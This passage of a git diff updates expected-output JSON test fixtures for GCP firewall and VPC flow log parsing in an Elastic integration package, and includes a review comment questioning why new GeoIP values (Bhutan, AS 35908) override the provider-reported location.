"firewall-rule", 
@@ -1764,7 +1788,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705605700Z", + "ingested": "2021-12-14T14:43:24.666230812Z", "original": "{\"insertId\":\"1sdfuwxfk8hq1b\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":44668},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.551617516Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -1861,7 +1885,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705611400Z", + "ingested": "2021-12-14T14:43:24.666231201Z", "original": "{\"insertId\":\"yot1ojetjdiw\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.168.2.7\",\"src_port\":1683},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"city\":\"Almelo\",\"continent\":\"Europe\",\"country\":\"nld\",\"region\":\"Overijssel\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:28.477733837Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:15.771161946Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -1969,7 +1993,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705617Z", + "ingested": "2021-12-14T14:43:24.666231588Z", "original": "{\"insertId\":\"5a27u1g22jks9e\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":45068},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:35.850729583Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -2077,7 +2101,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705622700Z", + "ingested": "2021-12-14T14:43:24.666231995Z", "original": "{\"insertId\":\"5a27u1g22jks8t\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":45062},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:35.85023465Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -2182,7 +2206,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705628300Z", + "ingested": "2021-12-14T14:43:24.666232397Z", "original": "{\"insertId\":\"1dobeotg13df9f5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.42.0.10\",\"src_port\":57794},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", diff --git a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json index 852d0346b78..a9b1d9947c8 100644 --- a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json +++ b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json 
@@ -1,41 +1,6 @@ { "expected": [ { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 33478, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1776, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", - "bytes": 1776, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -46,6 +11,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -66,8 +34,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 33478, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1776, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391119800Z", + "ingested": "2021-12-14T14:43:27.415168865Z", "original": "{\"insertId\":\"ut8lbrffooxyw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:45:37.186193305Z", 
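Review bot: The new expected `destination.geo` for 67.43.156.13 (Bhutan, `BT`, AS 35908) contradicts the `dest_location` the log itself carries in `event.original` on the same hunk (`asn: 15169`, `continent: America`, `country: usa`), which the previous fixture preserved; the fixture now asserts that a local GeoIP/ASN lookup overwrites the provider-reported location. This is presumably the test database bundled with the newer elastic-package stack rather than a pipeline change, but the precedence it locks in is worth confirming, because a stale or mismatched local database would silently replace GCP's own attribution and analysts pivoting on ASN or country would trust the wrong value. If the provider values are meant to win, the geoip processor should only fill fields that are still empty (or write to a separate target) and this fixture should be regenerated; if the lookup is meant to win, a sentence in the data stream docs stating that GeoIP enrichment takes precedence over `dest_location`/`src_location` would save the next reader the same question. The ingest pipeline that produces these fields is outside this diff.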
@@ -75,6 +68,18 @@ "id": "ut8lbrffooxyw", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", + "bytes": 1776, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -89,11 +94,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -165,7 +175,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391145800Z", + "ingested": "2021-12-14T14:43:27.415171258Z", "original": "{\"insertId\":\"ut8lbrffooxzb\",\"jsonPayload\":{\"bytes_sent\":\"173663\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"68\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466657665Z", @@ -181,11 +191,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33576, 
@@ -263,7 +278,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391169Z", + "ingested": "2021-12-14T14:43:27.415172027Z", "original": "{\"insertId\":\"ut8lbrffooxze\",\"jsonPayload\":{\"bytes_sent\":\"155707\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821143836Z\",\"packets_sent\":\"78\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510622432Z", 
@@ -274,9 +289,36 @@ } }, { + "@timestamp": "2019-06-14T03:50:10.845Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.139.99.242", + "192.168.2.23" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC" + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { "continent_name": "Europe", 
@@ -299,6 +341,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415172500Z", + "original": "{\"insertId\":\"ut8lbrffooxyz\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.168.2.23\",\"dest_port\":59679,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:45.860349247Z", + "end": "2019-06-14T03:40:46.031032701Z", + "id": "ut8lbrffooxyz", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -310,20 +362,28 @@ "iana_number": "6", "packets": 1, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "192.168.2.23" + "10.87.40.76", + "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { - "reporter": "SRC" + "reporter": "SRC", + "rtt": { + "ms": 36 + } }, "source": { "vpc": { 
@@ -338,21 +398,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391173100Z", - "original": "{\"insertId\":\"ut8lbrffooxyz\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.168.2.23\",\"dest_port\":59679,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:45.860349247Z", - "end": "2019-06-14T03:40:46.031032701Z", - "id": "ut8lbrffooxyz", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", 
@@ -373,6 +418,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415173Z", + "original": "{\"insertId\":\"ut8lbrffooxz6\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:36.895188084Z", + "end": "2019-06-14T03:40:37.048196137Z", + "id": "ut8lbrffooxz6", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -384,25 +439,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "192.168.2.117" + "192.168.2.117", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -413,23 +467,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391177600Z", - "original": "{\"insertId\":\"ut8lbrffooxz6\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:36.895188084Z", - "end": "2019-06-14T03:40:37.048196137Z", - "id": "ut8lbrffooxz6", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, 
@@ -450,6 +495,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415173396Z", + "original": "{\"insertId\":\"ut8lbrffooxzf\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:36.895188084Z", + "end": "2019-06-14T03:40:37.048196137Z", + "id": "ut8lbrffooxzf", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -461,46 +516,6 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:10.845Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.2.117", - "10.87.40.76" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391183100Z", - "original": "{\"insertId\":\"ut8lbrffooxzf\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:36.895188084Z", - "end": "2019-06-14T03:40:37.048196137Z", - "id": "ut8lbrffooxzf", - "category": "network", - "type": "connection" } }, { 
@@ -515,11 +530,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -591,7 +611,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391187800Z", + "ingested": "2021-12-14T14:43:27.415173838Z", "original": 